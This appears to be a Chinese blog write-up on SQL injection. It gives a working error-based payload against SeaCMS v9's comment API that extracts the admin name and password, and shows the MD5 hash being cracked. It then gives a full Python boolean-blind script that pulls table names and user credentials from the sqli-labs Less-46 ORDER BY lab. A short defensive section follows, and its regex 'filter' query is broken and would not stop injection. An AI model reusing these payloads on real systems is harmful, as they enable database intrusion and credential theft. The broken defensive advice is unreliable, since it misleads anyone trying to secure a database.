对seacmsv9进行sql注入,orderby,过滤information_schema
- 人工智能
- 2025-09-19 21:30:01
对seacmsv9进行sql注入,orderby,过滤information_schema 1.对seacmsv9进行sql注入
海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,采用的是 php5.X+mysql 的架构
seacmsv9漏洞文件:./comment/api/index.php,漏洞参数:$rlist
由于seacms开源,可以知道seacmsv9系统数据库(mysql)为seacms,存放管理员账号的表为sea_admin,表中存放管理员姓名的字段为name,存放管理员密码的字段为password
使用以下语句注入
http://localhost/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml(1,concat_ws(0x20,0x5c,(select name from%23%0asea_admin limit 0,1)),1), @`'` # 定义SQL变量 `@'`(反引号用于绕过单引号过滤)。 # 目的是构造合法的SQL语法,避免因单引号未闭合导致语句错误。 # updatexml(XML_doc, XPath, new_value) 函数滥用:修改XML文档的节点值。当 `XPath` 参数格式非法时,MySQL会抛出错误,并将非法内容回显到错误信息中。 #构造格式错误的XPath:concat_ws(0x20,0x5c, (子查询)) #子查询:`select name from sea_admin limit 0,1` 提取第一个管理员用户名。: #0x20 是空格,0x5c 是反斜杠 `\`。 #`%0a` 是换行符,绕过某些过滤规则(如空格过滤)但是返回返回以下,并没有返回报错与查询的值
rlist: 空对象,可能表示排序参数未生效或注入逻辑未触发数据回显。
使用Wireshark抓包mysql数据包,最终发现执行下面语句
SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=1 AND id in (@`\'`, updatexml(1,concat_ws(0x20,0x5c,(select name from# sea_admin limit 0,1)),1), @`\'`) ORDER BY id DESC于是去mysql数据库里面执行上面的代码,发现一样不报错不返回值
尝试修改语句,查询database()就可以查询数据库表名
SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=1 AND id in (@`\'`, updatexml(1,concat_ws(0x20,0x5c,(select database()),1), @`\'`) ORDER BY id DESC没有返回报错与查询的值,但是查询database()就可以查询数据库表名,于是查询sea_comment,发现居然没有数据,于是就插入了几条数据,发现可以执行了
密码也是如此------注入密码为23a7bbd73250516f069d,可以看出是经过md5加密的,于是到md5在线解密破解,md5解密加密解密,得到密码为admin123
2.orderbysqlilabs靶场第46关
参数sort传入id可以得到
参数sort传入username可以得到
于是可以用sort=if(表达式,id,username)的方式注入,用BS爬取表格中username下一格的值是否等于Dumb来判断表达式的真假,并使用二分查找加快注入速度,从而实现boolen注入
import requests from bs4 import BeautifulSoup def get_username(resp): soup = BeautifulSoup(resp,'html.parser') username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text return username def inject_database_boolen(): tables = '' i = 1 while True: left = 32 right = 127 mid = (left + right) // 2 while left < right: url = f"http://127.0.0.1/sqli-labs-php7-master/Less-46/index.php?sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- " resp = requests.get(url) if 'Dumb' == get_username(resp.text): left = mid + 1 else: right = mid mid = (left + right) // 2 if mid == 32: break tables += chr(mid) i += 1 print(tables) def inject_table_boolen(): tables = '' i = 1 while True: left = 32 right = 127 mid = (left + right) // 2 while left < right: url = f"http://127.0.0.1/sqli-labs-php7-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from \ information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- " resp = requests.get(url) if 'Dumb' == get_username(resp.text): left = mid + 1 else: right = mid mid = (left + right) // 2 if mid == 32: break tables += chr(mid) i += 1 print(tables) def inject_column_boolen(): tables = '' i = 1 while True: left = 32 right = 127 mid = (left + right) // 2 while left < right: url = f"http://127.0.0.1/sqli-labs-php7-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from \ information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{mid},id,username) -- " resp = requests.get(url) if 'Dumb' == get_username(resp.text): left = mid + 1 else: right = mid mid = (left + right) // 2 if mid == 32: break tables += chr(mid) i += 1 print(tables) def inject_data_boolen(): tables = '' i = 1 while True: left = 32 right = 127 mid = (left + right) // 2 while left < right: url = f"http://127.0.0.1/sqli-labs-php7-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,':',password) \ from users),{i},1))>{mid},id,username) -- " resp = requests.get(url) if 'Dumb' == get_username(resp.text): left = mid + 1 else: right = mid mid = (left + right) // 2 if mid == 32: break tables += chr(mid) i += 1 print(tables) if __name__ == '__main__': inject_data_boolen() 3.过滤information_schema解决方案(mysql)1.创建只读用户---仅允许访问业务数据库(如 target_db),禁止访问系统表
CREATE USER 'web_user'@'localhost' IDENTIFIED BY 'strong_password'; GRANT SELECT ON target_db.* TO 'web_user'@'localhost'; FLUSH PRIVILEGES;2.撤销 information_schema 权限
REVOKE SELECT ON information_schema.* FROM 'web_user'@'localhost'; FLUSH PRIVILEGES;3.正则匹配拦截----若查询包含 information_schema,直接拒绝执行。
SELECT * FROM target_table WHERE query NOT REGEXP 'information_schema';对seacmsv9进行sql注入,orderby,过滤information_schema由讯客互联人工智能栏目发布,感谢您对讯客互联的认可,以及对我们原创作品以及文章的青睐,非常欢迎各位朋友分享到个人网站或者朋友圈,但转载请说明文章出处“对seacmsv9进行sql注入,orderby,过滤information_schema”
